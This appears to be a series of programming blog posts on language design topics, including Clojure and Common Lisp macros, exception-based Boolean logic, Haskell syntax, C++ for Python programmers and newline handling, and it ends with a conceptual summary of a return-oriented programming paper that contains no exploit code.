Denotational semantics is hard

Conal Elliott's blog makes me feel stupid. This isn't a difficult feat; any math I don't understand will generally do the trick. But usually the feeling is misguided, because the problem is ignorance, not stupidity — when I don't understand something, it's probably because I don't know the concepts, not because I can't follow the reasoning.

Conal's blog is different. He builds everything out of simple concepts I already know, and explains his reasoning in painstaking, executable detail, and often I still don't get it. After reading a few such posts, I start to think I'm just too stupid to understand. Or, at least, that denotational semantics with partially defined values is hard enough that I can't wing it by knowing the basic concepts and figuring out the rest as I read. (When I put it that way, I don't feel so bad.)

I think part of the problem, beyond simple unfamiliarity, is that Conal's reasoning is mostly algebraic, and I'm not used to relying on that. Whenever I'm uncertain, I fall back on operational reasoning: I work through the computation and check that the results are what I expect. But this only works when I know what to expect. A typical Conal post is a tower of abstraction so high that when I try to check something, I'm not sure what the results ought to be. I have nothing to anchor my operational rope to, so when I lose my grip on the tower, I fall.

Fortunately, Edward Yang has come to the rescue with some helpful background posts on the very tools Conal uses. He walks the reader through explicit bottoms and the definedness partial ordering and fixpoints and lubs in great detail, with plenty of illustrated examples. (I like the hand-drawn diagrams. They look silly at first, but the absence of typesetting constraints probably allows them to be clearer than machine-drawn pictures would be.) It's all textbook material, and so detailed that it almost seems an insult to the reader's intelligence, but it's a textbook I haven't read, and apparently I deserve the insult. The detail provides valuable practice both at thinking in terms of these concepts and at algebraic reasoning about them, which is just what I needed. Some of Conal's posts are looking a little less mysterious now.

Macro of the day: build-list

Some operations are rare in “real” programs but common in throwaways and toys. One of these is creating lists of random data. Toy programs frequently use random input, simply because it's easier than getting real data. Usually this takes the form of evaluating some (random-thing) expression over and over and returning a list of the results:

(map (λ (x) (random-thing)) (range n))

The unused x here offends me. The randomly generated things usually don't depend on where they end up in the list, so why should the function that generates them receive the index as an argument?

I only find the unused argument annoying if it's in an explicit λ. Doing the same thing with Clojure's for doesn't feel nearly as sinful, since it doesn't explicitly say the index is being passed to a function:

(for [x (range n)] (random-thing))

That's acceptably simple. But what I really want to write is something like this:

(build-list n (random-thing))

...which evaluates (random-thing) n times and returns the results as a list. This is a straightforward macro:

(defmacro build-list
  "Return a seq of the results of evaluating EXPR N times."
  [n expr]
  `(for [i# (range ~n)] ~expr))
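A quick check of the macro, using Clojure's built-in rand-int in place of the hypothetical (random-thing); the particular numbers are, of course, made up:

(build-list 3 (rand-int 100))   ; => (42 7 89), say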

Or, in CL (which, even using loop, doesn't look good in comparison):

(defmacro build-list (n body)
  ;; with-gensyms, as in On Lisp or Alexandria, keeps the counter from capturing a name in BODY
  (with-gensyms (i)
    `(loop for ,i from 1 to ,n collect ,body)))

Clojure's built-in repeatedly is the functional equivalent of build-list: it's map over range, but without passing the argument. With # as a one-character λ, this approaches the ideal:

(repeatedly n #(random-thing))

These tools are simple and frequently useful, especially in the throwaway programs that most benefit from library support, but few standard libraries offer them. Some come close, but can't resist including the index as an argument. Racket, for instance, has a build-list function which is equivalent to map over a range, but it's barely an improvement for this use:

(build-list n (λ (x) (random-thing)))

I suspect this is because of cultural dissonance. Calling something repeatedly without passing it an argument is obviously useful only if it's not purely functional, and functional programmers tend to be suspicious of that. We (well, except for the Haskellers) accept impurities like randomness, but not so enthusiastically that we're comfortable including additional library functions to help with them. We expect our libraries to do the Right Thing, and some of our trusted heuristics tell us that making lists of random data is not the Right Thing. So, useful or not, we don't really try to make it easy.

What's so cool about APL?

Why does APL have such a devoted following, despite its strange appearance? What have its users, since the 1960s, seen in it that made them embrace such an unpopular language?

I'm not one of those fanatical APLers, but I think I understand why. Imagine the year is 1965. All computing is on mainframes, and the only high-level languages you've ever seen are Fortran and Algol-60. And then one day you meet APL, and discover:

  • It has a read-eval-print loop: you can type expressions in and see the results immediately, without running a compiler. It's a remarkably powerful calculator, in the days before calculators were common. (This may account for its popularity in finance.)
  • It's mostly functional: most operations return a result rather than requiring you to specify a destination to modify, so you can easily combine many operations in one expression.
  • It has built-in collections — specifically multidimensional arrays, but any decent collection support would do as well. We take collections for granted nowadays, at least in languages higher-level than C, but this wasn't always so. There's a reason many early languages (not just APL and Lisp) were built around a collection type.
  • It has high-order operations: map is (often) implicit, and reduce, scan, and Cartesian product are single characters.
  • It's terse, and not just because of its one-character names. You really can say in a line of APL what would take a page of Fortran.

Under these circumstances, wouldn't you be amazed by the powerful new language? Wouldn't you become a faithful user, and for decades wonder why all other languages were so uselessly primitive?

Complaining about defsystem

Xach wrote a tool to create boilerplate for ASDF projects. I winced to read this. It may be useful, sure, but it hurts to see “little projects” require three files and an ASDF registration.

I've never had the good fortune to work on a Common Lisp program large enough to need defsystem, and most other languages get by without it, so to me all this complexity looks not only unfamiliar but unnecessary. As a result, when I think about module systems and library loading and such, I tend to dismiss most of the potential features as esoteric. Separate compilation, compile-time circular dependencies, multiple versions, replaceable implementations, parameterised modules, analyzing dependencies without loading — these all seem less important than the mundane convenience of being able to write a library in a single file.

I suppose it's better to focus on problems I actually have than on ones I've only heard about. But I wonder which of the problems I'm ignoring are actually important.

The worst thing about viruses is...

Today I heard someone praising Linux as a desktop OS, on the grounds that it's not very susceptible to viruses. This, he said, was good because it “saves cycles” and cuts down on reinstalls.

Not because they're a security threat. That, apparently, was not on the radar.

I think the cycles he was talking about were those taken by antivirus software, not by the viruses themselves, but the point is clear: many users see viruses as an annoyance, not a threat. Performance and convenience — those are the things that matter.

The speaker was a programmer who is involved in designing network protocols. Maybe he was only giving the reasons he thought his audience would understand. I didn't ask; I'm afraid of what the answer would be.

Correct ≠ safe

I wrote, too optimistically:

It's easy to write correct string operations, even in C, even for null-terminated strings in fixed-size buffers — and security-conscious C programmers often do.

Barry Kelly objected:

I don't agree that it is easy [...] to write correct code in C for manipulating null-terminated strings in fixed sized buffers, for a simple reason: if you can't let the fixed length follow the string, either via static typing or dynamically, then normal procedural abstraction will tend to hide the length and lead to errors later.

I didn't find that very convincing until a few weeks ago, when I spent a late night tracking down a mysterious buffer overflow: I had used a “safe” string operation with the wrong buffer size.

Shame vs. helplessness

On Monday I got a bug report: I had broken something due to a stupid oversight. I felt ashamed.

On Tuesday I got another bug report: I had broken something else by making a deliberate change based on reasoning that was completely, obviously wrong. I felt even more ashamed.

On Wednesday I got a third bug report: some poorly factored code — not mine, for a change — had, unsurprisingly, turned out to have perverse error behaviour. Over the course of the day, one of its authors made a series of misguided attempts to fix it, introducing at least one new bug in the process. Watching, I felt even worse than I had about my own stupid mistakes.

Of course: this is an effect of (the illusion of) control. A problem is scarier and more frustrating when you don't feel you can do anything about it. I could imagine avoiding my own mistakes by being smarter or more careful or something, but I have no such illusions about my ability to prevent other people from making mistakes. So I feel helpless about them, and that's more unpleasant than feeling ashamed of my own stupidity.

(Both of my stupid mistakes, by the way, were in code I didn't want to write. It's easy to pay attention to code that does something you care about; it's harder when you don't actually want the functionality you're implementing.)

What? No composition?

I think of function composition as a basic operation, one used regularly in any functional language. But if it's really so common, how could I forget Common Lisp doesn't have it? It has identity and complement and plenty of high-order collection operations, so naturally one might expect it to have compose too. I assumed it did, and was recently surprised to hear otherwise. Evidently I've never tried to use it and found it missing.

This says something about how little high-order style is used in Common Lisp. With the annoyance of #', and no convenient partial application, and no lambdaless define in the function namespace, almost all functions are written with a (possibly implicit) lambda; uses of compose are not very common. Common Lisp may be more expressive than most languages, but it's still far from pseudocode.
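For contrast, here's the kind of throwaway composition that becomes routine when comp and short function references are cheap — a trivial Clojure example, nothing more:

(require '[clojure.string :as str])

(map (comp str/upper-case str/trim) ["  a " " b  "])   ; => ("A" "B")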

Is infix lambda hard to read?

I've been using infix lambda in pseudocode for a couple of years, with mixed results. I find it very easy to write, because it's so terse, and I tend to use it for any one-argument function I can't get by partial application and simple combinators. But I find it surprisingly hard to read.

The symptom is that I mistake the parameter list for an expression. For example, in a definition like this...

gravitate bodies = map (b → accelerate b (field b bodies)) bodies

...I sometimes read the first b as a free variable, and spend a confused moment trying to figure out where it's bound, before I notice the operator and realize that I'm looking at the binding occurrence. This mistake is especially easy to make in larger definitions, where it's not obvious the b doesn't refer to some local variable I've forgotten about — and where it takes longer to see that no such variable exists.

I think the underlying problem is that the parameter list is the left argument of →, so when I read an expression left-to-right, I encounter it before the operator. Since I haven't yet seen any hint that it's not an expression, I try to read it as one, and fail. Ordinary lambda, in contrast, announces its specialness first, so I'm not surprised by the parameter list.

If this really is the problem, then it should also affect other operators whose left arguments aren't expressions. But there aren't many. The only one I can think of is the ubiquitous (in my pseudocode, at least) infix define, =, which may be less confusing because it's used in distinctive contexts (at top level or in a progn). There are a few common operators whose right arguments are special (e.g. . for field access), but it seems few infix operators have left arguments that aren't expressions.

What do C♯ users (at least those few who use lambda much) think? Do you have trouble reading =>?

Function of the day: sum

Most folds are sums — either (fold + 0 ...) or (fold + 0 (map f ...)). In math and pseudocode, they're written as Σ or sum, not as folds. So programming languages should support writing them the same way. In Clojure:

(defn sum "Add the elements of a collection, or some function of them."
  ([xs] (reduce + xs))
  ([f xs] (reduce (fn [a x] (+ a (f x))) 0 xs)))
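A couple of uses, to show both arities:

(sum [1 2 3 4])                ; => 10
(sum count ["a" "bc" "def"])   ; => 6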

This is one of those trivial conveniences that I use with surprising frequency — more than many more familiar operations. Counts from a 286-line Clojure program:

Count  Operation
   11  sum
   11  #(...) (op or abbreviated λ)
    5  format (I/O is everywhere)
    4  fn (λ)
    4  count
    3  map
    3  reduce (counting the two to implement sum)
    2  filter
sum may be trivial, but at least in this program, it's more common than map, reduce, and filter combined. Isn't that enough to deserve a place in the library?

(For performance reasons, Clojure's + isn't an ordinary generic function and thus can't be taught to work on vectors, so sum doesn't either. This program does vector arithmetic, so I had to duplicate various arithmetic operations for vectors, so three of these uses of sum were actually of a separate vsum. But this distinction would not be necessary in an ideal language.)

Pipe for functions

One of the minor annoyances of prefix notation for function call is that it gets the order of operations backwards. When you compose several functions into an expression, you generally have to write the last step first:

(handle-message (decrypt (receive socket) key))

If you explained this to a computer the same way you explain it to a human, you'd probably write the steps in the order they're performed. If you're used to Unix pipelines, you might write it like this:

receive socket | decrypt _ key | handle-message

In a language with user-defined infix operators, it's easy to support exactly this. You can define a | operator which simply applies its right argument to its left — the same as Haskell's $, but with the arguments reversed. It looks and feels very like the Unix |: it connects the output of one expression to the input of the next. The channels used are return value and arguments rather than stdout and stdin, but the effect is the same.

I can't remember where (edit 16 Feb 2011: here, at least, and also |> in F#), but I think I've heard this operator suggested before for Haskell — presumably with a different name, since | is taken. Ignoring that inconvenient detail, its Haskell definition is simple:

infixl 0 |
(|) :: a → (a → b) → b
x | f = f x
-- Or, to make the similarity to $ clearer:
(|) = flip ($)

Like $, this is a contemptibly trivial operator. All it does is apply one argument to the other, which doesn't sound like it could possibly be worth spending an infix operator on. But I find myself using it constantly in pseudocode, because it lets me write operations in the right order. It doesn't make code shorter, but it significantly reduces the distance between the code I write and the representation in my head. That's important enough to be worth a one-character infix operator.

Like any high-order operator, | is much more useful when you have a terse way to write simple functions. Usually this means partial application, either in the form of currying, or an explicit partial application operator, or op, or implicit op (as in the example above). Combinators are nice by themselves, but they need partial application to be really useful.
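Clojure gets much the same left-to-right feel from its built-in -> threading macro — not the same operator (it's a macro, and it threads the value in as the first argument), but it scratches the same itch. Using the hypothetical functions from the example above:

(-> (receive socket)
    (decrypt key)
    (handle-message))
;; reads in execution order, and expands to
;; (handle-message (decrypt (receive socket) key))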

Shorter words for “expression”

Some common terms for programming languages vary widely in meaning, but at least one is understood across languages: virtually everyone agrees on “expression”.

Well, except in those communities that use the concept most. They have their own words for it. In Lisp, an expression is called a “form”; in the ML and statically-typed-functional-languages community, it's called a “term”. And let's not forget graph reduction, where it's called a “redex” (supposedly for “reducible expression”, although the “reducible” part is no longer relevant to the meaning). These terms all mean exactly the same thing, and all of the communities accept “expression” as a synonym, but they also have their own equivalents.

Private terms for common concepts usually exist to show group affiliation. That may be contributing here, but I think the main reason for replacing “expression” is brevity. It's difficult to write about programming languages (especially expression languages) without mentioning expressions exceedingly often, so there's a strong incentive to use a shorter word. “Expression” has three syllables and a difficult four-consonant cluster; “form” and “term” are easy one-syllable words. “Redex” is two syllables, which may explain why it's less popular than the other two.

None of the replacements are particularly transparent, but that doesn't matter much for such common words. (“Expression” doesn't make much sense either.) Apparently terms for such basic concepts needn't be obvious, as long as they're short.

Brevity may also be one of the reasons “thread” has largely replaced “process”. (The other reason is, of course, that popular OSes unify processes with other things like address spaces and security domains, and the word “process” has come to refer to the whole bundle rather than the original concept.)

Bursts of productivity are fun

I spent most of today slacking off at work, reading about astrophysics and paying only casual attention to actual work. But an hour or two past noon, a bug caught my eye — a simple mathematical matter of correctness, which I could feel good about fixing. It proved harder than I expected, and I soon filled a whiteboard with data structure diagrams and equations. After some frustration, I noticed other people leaving, and looked at a clock, which was obviously broken, since it said 5:00.

I turned back to the whiteboard, and saw that my previous approach was unnecessarily complicated. So I fixed that bug, and found another, and fixed it, and after fixing six bugs in a little over an hour, I lost interest and went back to reading.

Sound familiar? Most programmers (and most creative workers of any kind) are accustomed to seeing their productivity vary wildly over time. On one day you get nothing done and feel guilty for not trying very hard; the next day is the same except for a brief burst in which you seemingly do a week's work in two hours. The Internet is full of programmers lamenting this situation, and wishing they could have these bursts every day.

I suspect this unwelcome variation accounts for part of the fun of programming. The periods of apathy and frustration lower your expectations, so when the bursts of activity arrive, they seem far beyond your normal ability — a contrast that can make even the most boring problems exciting. I noticed this effect today: that one hour when everything went right, and everything worked on the first try, would not have been so impressive if it hadn't been preceded by a few hours of frustration. If you were modestly productive all the time, you might get the same total work done, but it would be more predictable, and you would have fewer moments of unexpected triumph. Mightn't that be less fun?

Exception logic

Programming generally requires Boolean logic, so every practical language supports it with if, and, not, and other such operators. In almost all languages, these operators receive their Boolean inputs as ordinary values. (if (and a b) c d) evaluates a, and the resulting value determines whether to evaluate b, and so on. This is all so obvious and familiar that it's hard to imagine it could be otherwise.

Icon does it differently. Icon expressions (and functions) have two continuations: they can succeed and produce a value, just like expressions in a thousand other languages, or they can fail. This feature has many uses, and one of them is to represent Booleans: Icon encodes them not in values but in success or failure. Its if operator doesn't look at the value returned by the conditional expression — it only looks at whether it succeeds or fails. Similarly, its or operator (called |) evaluates its second argument only if the first fails. In Icon, Booleans aren't values.

Few languages have Icon's success/failure semantics, but it doesn't take exotic semantics to encode Booleans this way. Any language with exceptions can do something similar: returning normally means true, and throwing an exception means false. Most languages with good support for exceptions use them extensively in their standard libraries, so functions that return exception Booleans are already common.

It's not often recognized, though, that one can define operators on these Booleans. I briefly thought Perl 6 did, based on a misunderstanding of its andthen and orelse operators, but it turns out they operate on defined vs. undefined values, not exceptions. (Perl, true to form, has several ways to represent booleans, one of which is defined/undefined.) However, there are a few exception-Boolean operators in existing languages, even if they're not usually described that way:

  • Ordinary progn/begin is the exception equivalent of and: it evaluates each subform only if the previous ones returned normally.
  • Many languages have an (assert expression) operator, which converts a value Boolean into an exception Boolean.
  • Common Lisp's (ignore-errors expression t) converts an exception Boolean into a value Boolean, returning nil on error and t otherwise. (However, it only handles errors, not all serious-conditions.)
  • Some test frameworks have a (must-fail expression) form, which throws an exception iff the expression doesn't. This is the exception-Boolean equivalent of not.

Given macros and an exception-handling construct, you can easily build others, such as or and if:

(defmacro succeeds (form)
  "Convert an exception Boolean to a value Boolean: return
true if this form returns normally, or false if it signals a
SERIOUS-CONDITION."
  `(handler-case (progn ,form t)
     (serious-condition () nil)))

(defmacro eif (test then &optional else)
  "Exception IF: THEN if TEST returns normally, otherwise ELSE."
  `(if (succeeds ,test)
     ,then
     ,else))

(defmacro eor (&rest forms)
  "Like OR, but treating normal return as true and
SERIOUS-CONDITION as false. Perhaps surprisingly, (EOR)
signals an exception, since that's its identity."
  (cond ((null forms) `(error "No alternatives in EOR."))
        ((null (cdr forms)) (car forms))
        (t `(handler-case ,(car forms)
              (serious-condition () (eor ,@(cdr forms)))))))

These operators may be a fun exercise, but are they of any practical use?

There is a tension in the design of functions that might fail in normal operation — those that depend on the cooperation of the environment, like opening a file or making a TCP connection, and even those that return something that may or may not exist, like hashtable lookup. Such functions face an awkward choice between indicating failure by their return value (e.g. returning nil, or a Maybe) or throwing an exception. A special return value is most convenient for callers who want to handle failure, because they can easily detect it with ordinary operators. But it often forces those who can't handle the failure to explicitly check for it anyway. An exception, on the other hand, is perfect for callers who can't handle failure and just want it to propagate up automatically, but awkward for those who can handle it, since in most languages it's much easier to check for nil than to catch an exception. So functions are forced to choose how they report failure based on guesses about how often their callers will want to handle it.

Exception logic might ameliorate this. If you can handle exceptions as easily as return values, then exceptions are no longer at an expressive disadvantage. This means you can use them more consistently: virtually any function that might fail can indicate it with an exception — even the commonly tentative ones like dictionary lookup. So exception operators are interesting not for their own sake, but because they may allow other parts of a language to be more consistent.

Like all error handling features, this is hard to experiment with in pseudocode, because it's so easy to ignore error behaviour. It's also hard to experiment with in a real language, because its value depends on changing so many library functions. So I wouldn't be surprised if I've overlooked some common case where exceptions are still inconvenient. But this sort of thing is worth looking into, because it could make libraries simpler and more consistent.

Haskell and syntactic complexity

Why isn't if a function in Haskell?

In most languages, if is a special form (or local equivalent). That's because if is lazy in its last two arguments, so it can't be a function in an eager language. But Haskell has no trouble with laziness; if can trivially be a function, with no need for special semantics, let alone syntax. There's even a page on the Haskell Wiki advocating switching to the simple functional if.

All this must have been obvious to the designers of Haskell. So why did they choose the Algolesque if ... then ... else ... syntax instead?

Of course this question has come up before. Paul Hudak, one of the designers, explains:

Dan Doel's answer is closest to the truth:
I imagine the answer is that having the syntax for it looks nicer/is clearer. "if a b c" could be more cryptic than "if a then b else c" for some values of a, b and c.

except that there was also the simple desire to conform to convention here (I don't recall fewer parentheses being a reason for the choice). In considering the alternative, I remember the function "cond" being proposed instead of "if", in deference to Scheme and to avoid confusion with people's expectations regarding "if".

To my eye, if a then b else c improves neither clarity nor familiarity, but evidently the Haskell designers thought otherwise. More interestingly, they didn't think the added syntactic complexity was much of a problem. How can this be? Doesn't Haskell culture value simplicity?

Yes, but not so much simplicity of syntax. I'm misled here by a superficial resemblance between the cultures of Haskell and Lisp. Both cultures are obsessed with mechanically processing code, and therefore want the language core to be as simple as possible. Since a minimal core is impractical to program in, both expect a larger, more useful language to be defined by translation to the core, so its complexity can be mechanically eliminated. And both consider the representation of code as text to be separate, at least in principle, from the core. So at first glance, it seems as if they should have the same attitude to syntactic complexity.

But they treat it quite differently. Lisp's culture considers syntax unimportant, and therefore tries to make it as simple and transparent as possible, so it won't prevent humans from seeing through it — because code is much more interesting than its textual representation. But Haskell's culture considers syntax safely separate from the language core, and is therefore willing to tolerate complexity in it. Since it goes away without inflicting any complexity on the core, why shouldn't it include whatever features are convenient?

This approach has given Haskell one of the prettiest syntaxes in the world, so I can't say it's wrong. It is uncomfortable, though, for a Lisper to see a culture which draws wildly different conclusions from seemingly similar premises. Maybe this is explained by modest differences in degree: Haskell values textual beauty a bit more than Lisp, and code-processing a bit less. Is that enough to explain the difference? I don't know. I don't understand.

From Python to C++

A few months ago someone asked me (well, a group that happened to include me) for advice on learning C++, for a Python speaker.

Ouch. What do you tell someone who's getting started with C++? What can you say that won't scare them away?

You could tell them the good reason behind many of C++'s complexities: that it's lower-level than Python, especially in data representation. You could tell them that's good when you care about efficiency and bad the rest of the time. But they probably already know that, and it's not the most useful sort of information.

You could give them bits of good advice, and warn them of the dangers. There are hundreds of specific tips and tricks they'll need to learn, but they wouldn't understand most of them until they knew more of the language. Failing that, you could at least give them some general warnings:

  • There is much less agreement on good style. There are often multiple incompatible accepted ways to do something, like, say, basic I/O. Some of the advanced features are painful to the point of uselessness.
  • Parts of the standard library are dangerously broken.
  • For reasons of backward-compatibility and low-level-ness, C++ is complicated. Don't expect to keep the whole language in your head, the way you can for Python.
  • Collection support is pretty bad.
  • There is a way to do anything, but it may be more trouble than it's worth.
  • A lot of C++ tutorial material appears to be written for and by idiots.
  • Manual memory management is hard. If it accounts for half of your bugs, that's normal.

But they'd forget all that before they learned enough to apply it. Is there a shorter summary of the differences between C++ and Python?

I'd put it this way: you can't trust C++. Python may have a few warts, but for the most part it makes sense, because someone designed it. Most features are there for a good reason, and the obvious way to do things is generally the right way. The language is a garden, planted with useful things, and its pathways are generally safe and will lead you somewhere useful.

C++, on the other hand, is a wilderness. It may have almost as many fruits and flowers as the garden, but they're hidden among poisonous plants and thorns, and guarded by poisonous snakes and tigers. There are paths, but they're hard to follow, and some of them lead off cliffs or into swamps or snares. To navigate C++, you must be your own guide, because the language won't help you.

I don't hate C++. I admire the degree to which it can support higher-level constructs without losing its low-level powers. But it's a hard language to introduce someone to, especially someone who's coming from Python and therefore expects languages to make sense.

Why the imperative examples?

Speaking of example programs: why are so many examples stateful? Wherever algorithms are explained — in textbooks, in academic papers, in websites formal and otherwise — the style of choice is overwhelmingly imperative. Assignment is everywhere; simple maps and folds are written as explicit iteration; data structures are updated destructively for no reason; even recursion is often expressed by loops and state. This is true even in pseudocode, where there's no practical reason not to write functionally. This annoys me. Why can't we write our examples clearly?

Some of this must be simply the inertia of formality. Imperative style used to be the only well-known option, so it's traditional, and when people try to look authoritative by imitating older authorities, they tend to copy their style, even if they wouldn't normally write that way. This happens for writing style, so why shouldn't it happen for programming style too?

Didactic examples also have a good reason to be conservative in the language they use: they're explaining something to someone who doesn't already know it, and may be ignorant of other concepts as well. State and iteration are familiar even to nonprogrammers, while many of the concepts of functional programming are not very widely known even among programmers. So maybe the imperative examples are comprehensible to a larger audience?

And maybe there's a cultural gap: if the people who study (and explain) algorithms have little overlap with those who study how to express them, they may simply be unaccustomed to functional style, and prefer something more familiar. But it seems to me I've seen oddly imperative examples even from people who know better and would never write “real” code that way.

I also suspect that state, especially in small programs, isn't as confusing as we like to think. Little examples don't have the maintenance and modularity problems that large programs do, so maybe state isn't much of a problem for them, and there's not much pressure to write more functionally.

But it still irks me. Is the state of the art, in 2010, to describe algorithms in terms of assignment? Must we communicate new ideas by implementations we would consider unreadable in any other context?

I know there are some people who explain algorithms with functional examples, especially in the Haskell community. But why isn't this the norm?

Expressiveness isn't always good for examples

One of the most common ways to learn a new concept is by reading an example implementation. I expect that most programmers, given a choice, prefer to see the example in as high-level a language as possible, to minimize the amount of irrelevant detail they have to ignore. I do, anyway... don't I?

Recently I saw an unfamiliar statistics algorithm illustrated in C++ — in particular, in a very basic subset of C++, with one class and no pointers or templates. To my surprise, I found that reassuring. The use of an unexpressive language made it obvious that there was nothing fancy going on — no fancy control flow, no infinite data structures, no high-order functions, no polymorphism. C++ has many potentially confusing features (e.g. templates, overloading), but in a one-page example, it was easy to see that none of them were used. It was also obvious that the algorithm didn't depend on any exotic language features like lambda or laziness or bignums or garbage collection, so I could easily use it in any language.

A more powerful language might have expressed the example in less code, but not a lot less — it was largely arithmetic, which C++ is not bad at. And in a more powerful language, even a smaller amount of code might have expressed many more plausible things. The choice of an obviously unexpressive language ruled out large classes of things the example wasn't doing, allowing me to more quickly understand it without getting lost in a large space of possibilities.

On the other hand, I have already forgotten the algorithm, so maybe I didn't understand it very well after all.

Java gets newline handling right

The platform-dependent representation of newlines (as CR, LF, or CR+LF) is a surprisingly persistent annoyance. In theory, this problem was solved decades ago, when I/O libraries began to automatically convert from the host platform's newline convention to a portable in-memory representation. But in practice, files are routinely shared across platforms without being converted along the way, so a file may contain any of the three newline sequences, or even a mixture of them. (No, really, I've run into this repeatedly.) Knowing the host platform's newline convention doesn't help when the data doesn't follow it.

The obvious solution is to recognize all three newline sequences, and treat them all identically. Unfortunately this creates ambiguity: a character such as CR might be a newline, or it might be a carriage return that occurs in the middle of a line, and the two will read identically. This means attempting to copy a file by reading and writing lines won't always preserve the original file. But this isn't a problem for most programs, because those that read lines of text generally only want input that makes sense as text, and that doesn't include arbitrary control characters. (Compare to C's restriction on the null character: it's valid but rarely plausible, so the restriction is not usually a problem.) As long as there are other operations for reading data in its raw form without interpreting it as text, the operation for reading lines need not distinguish between newline conventions.

It's also convenient to do newline conversion in the read-line operation, not as a feature of the underlying stream. This makes it easy to reversibly read text with control characters, and also makes it easier to mix text and other data in one stream. As a bonus, it eliminates the need to specify text or binary mode when opening a file.

My brilliant ideas have, of course, already occurred to someone else, and been implemented in a popular language: Java. From the documentation for java.io.BufferedReader:

public String readLine()
                throws IOException

Reads a line of text. A line is considered to be terminated by any one of a line feed ('\n'), a carriage return ('\r'), or a carriage return followed immediately by a linefeed.

Returns:
A String containing the contents of the line, not including any line-termination characters, or null if the end of the stream has been reached

Wrapping a stream in a BufferedReader is awkward, but readLine does exactly what I want. Not even Perl solves this text processing problem so conveniently! Java is not rich in such conveniences, so I was surprised to discover that it has this one. It may be motivated by portability: Java wants programs to behave identically on all platforms, and platform-dependent newline handling violates that.
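Clojure gets this behaviour for free, since clojure.java.io/reader hands back a BufferedReader and line-seq just calls its readLine — a quick sketch, with a made-up file name:

(require '[clojure.java.io :as io])

(with-open [r (io/reader "mixed-newlines.txt")]  ; hypothetical file
  (doall (line-seq r)))                          ; CR, LF, and CR+LF all end lines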

C# (or rather .NET) follows Java here. So, presumably, do most JVM and .NET languages. I suspect there are others that have either borrowed this feature or invented it independently. Which ones?

Update April 2014: Python calls this “universal newlines”, and has had it since 2003.

(It would be nice to detect text encodings the same way, since many streams have unknown or mislabeled encodings. Unfortunately, there are byte sequences that are not only possible but plausible in more than one encoding, so there is no solution reliable enough to be the default.)

Text statistics as summaries

Darius Bacon mechanically summarizes the Lord of the Rings by determining the most anomalously frequent words in each chapter. The word lists are surprisingly evocative. It's obvious which chapter this is, for instance:

Gorbag Shelob Lugbúrz Shagrat Ladyship Ya hoi belly

Or this:

Parth Galen Rauros glade cloven boat fate bearer

Even those word lists that don't include important names or events are still recognizable. I would not expect to recognize this, but I do:

quality Númenóreans Damrod mistress squirrel wiser arts Mablung

Word frequency is sensitive to repetitive text, such as the songs Tolkien is so fond of. This can be a problem. This chapter, for instance, is less obvious:

fiddle inn cow local Mugwort diddle tray comer

Or this one, which is dominated by characters who aren't even in the story:

Tinúviel Beren Thingol Bob Lúthien hemlock midges Gil

But most stories don't include many songs or poems. (Whether this is a bad thing depends on how good you expect the marginal poem to be.)

This could be a great way to generate tables of contents. It's much more flexible than hand-written chapter titles, since it works on arbitrary chunks of text. Instead of summarizing only the chunks someone thought to write titles for, you could summarize arbitrary levels of coarseness: hundred-page chunks for a high-level TOC, and smaller ones as you zoom in on a specific section. It could also be helpful for navigating large files: when you're looking for a certain part of a file but don't have a good search term, it might be faster to read through an automatic summary than to manually skim through the text.
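The core idea is easy to sketch: count word frequencies in the chunk and in the whole text, and rank each word by how overrepresented it is in the chunk. Here's a rough Clojure version (my own crude scoring, not Darius's — see his post for the real thing):

(require '[clojure.string :as str])

(defn word-freqs [text]
  (frequencies (re-seq #"[\p{L}']+" (str/lower-case text))))

(defn anomalous-words
  "Words most overrepresented in CHAPTER relative to CORPUS.
   A rough sketch of the idea, not Darius's actual scoring."
  [chapter corpus n]
  (let [cf (word-freqs chapter)
        tf (word-freqs corpus)]
    (->> cf
         (sort-by (fn [[w c]] (- (/ (double c) (inc (tf w 0))))))
         (take n)
         (map first))))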

Darius' post includes code, so you can see how it works, and try it yourself.

Strings and lines

I was recently surprised by the behavior of the . regex operator in Perl: it matches any character except newline. This seems like the sort of thing I should have already known. It's right there in the documentation. But if I ever knew it, I've forgotten, which suggests I've never tried to match a regex against a multiline string.

Well, of course. How often do you do anything to strings containing newlines, except for printing them out intact?

For that matter, how often do you have such strings at all? Most strings, after all, are either 1) lines of files, which by definition don't contain newlines, or 2) names of some sort, which usually can't contain control characters of any kind. (Yes, filenames can theoretically contain control characters. But have you ever seen one, except for the time you created one to see if it worked?) Even strings that could in principle contain newlines, such as error messages, usually don't, because the possibility doesn't occur to programmers. Control characters aren't real characters, are they?

And, of course, many languages don't allow newlines in string literals. In those that do, they're rarely used.

It seems to me that I (and most programmers, probably) overgeneralize from this: I think of newlines, like nulls and other control characters, as not generally being valid in strings. Consciously, I know strings can contain arbitrary characters, but unconsciously, I think a string must be one line.

The inevitable interpreter

This must be the cutest code injection method ever. Hovav Shacham's paper The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) describes yet another method of injecting code into a process by clobbering its stack. The cute part isn't the title (although it did tempt me to read the paper). The cute part is that this method uses a Turing-complete language for which an interpreter already exists by accident.

It's a generalization of a well-known method called return-into-libc: if you can overwrite a function's return address, you can turn its return into a call to some existing function, such as one from a common library like libc. If you can arrange for the return address of that call to be another library function, you can call a series of them: it's threaded code, expressed through return addresses. This lets you run code of your choosing without injecting any machine code of your own, so it works even if you don't have write access to any executable memory.

But it's limited in its expressiveness, because it only calls the functions provided by the target library, and those usually don't form a complete basis for computation. The available libraries don't generally include functions for branching, looping, moving data around, and the other trivial operations that enable computation. (Languages whose standard libraries contain lots of high-order functions may be more vulnerable in this respect, but since they're not so widely used and most of them are memory-safe, they aren't very attractive attack targets.) Return-into-libc exploits an accidental threaded-code interpreter, but not a very flexible one: it can call arbitrary functions, but it can't compute much.

This paper removes this limitation by showing that the provided functions are not the only possible targets for return-into-libc. Any sequence of instructions ending in a ret can in principle be called as a function, and such sequences are common — they occur at every return site of every function! Furthermore, many such sequences perform useful operations such as arithmetic, conditionals, moves, and looping. These are the missing primitives needed to make return-into-libc Turing-complete. The necessary sequences occur quite frequently in real code, so any substantial x86 library contains a Turing-complete threaded-code interpreter.

